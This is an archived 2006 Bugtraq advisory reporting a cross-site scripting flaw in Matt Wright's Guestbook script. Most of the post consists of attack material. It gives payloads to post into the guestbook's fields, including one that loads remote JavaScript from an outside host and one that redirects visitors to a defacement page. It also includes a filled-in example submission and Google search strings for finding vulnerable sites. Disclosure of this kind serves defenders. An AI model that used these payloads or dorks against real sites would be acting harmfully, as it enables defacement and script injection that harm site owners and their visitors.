lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060408133309.17444.qmail@securityfocus.com>
Date: 8 Apr 2006 13:33:09 -0000
From: liz0@...mail.com
To: bugtraq@...urityfocus.com
Subject: Matt Wright Guestbook Xss Script &#304;njection


Matt Wright Guestbook Xss Script &#304;njection 

----------------------------------------------------
site:http://www.scriptarchive.com/
demo:http://www.scriptarchive.com/readme/guestbook.html
--------------------------------------------------
Post This Code:

<script>alert(/Liz0ziM/)</script>

<script src=http://liz0.li.funpic.org/hacked.js></script>

<script>location.href="http://evilsite.com/deface.html";</script>

vs..
---------------------------------------------------------
Example Post Message :

Your Name:<script>alert(/Liz0ziM/)</script>
E-Mail:<script>alert(/Liz0ziM/)</script>
URL:blabla
City:blabla , State:blabla Country:blabla
Comments:<script>location.href="http://evilsite.com/deface.html";</script>

----------------------------------------------------------
Credit:Liz0ziM
Mail:liz0@...mail.com
Site:www.biyo.tk,www.biyosecurity.be
------------------------------------------------------------
Google:
"Scripts and guestbook created by: Matt Wright "
inurl:guestbook.html
inurl:addguest.html
inurl:"* Back to the Guestbook Entries"
---------------------------------------------------------------
Source:

http://www.blogcu.com/Liz0ziM/431712/
http://liz0zim.no-ip.org/mattguestbook.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ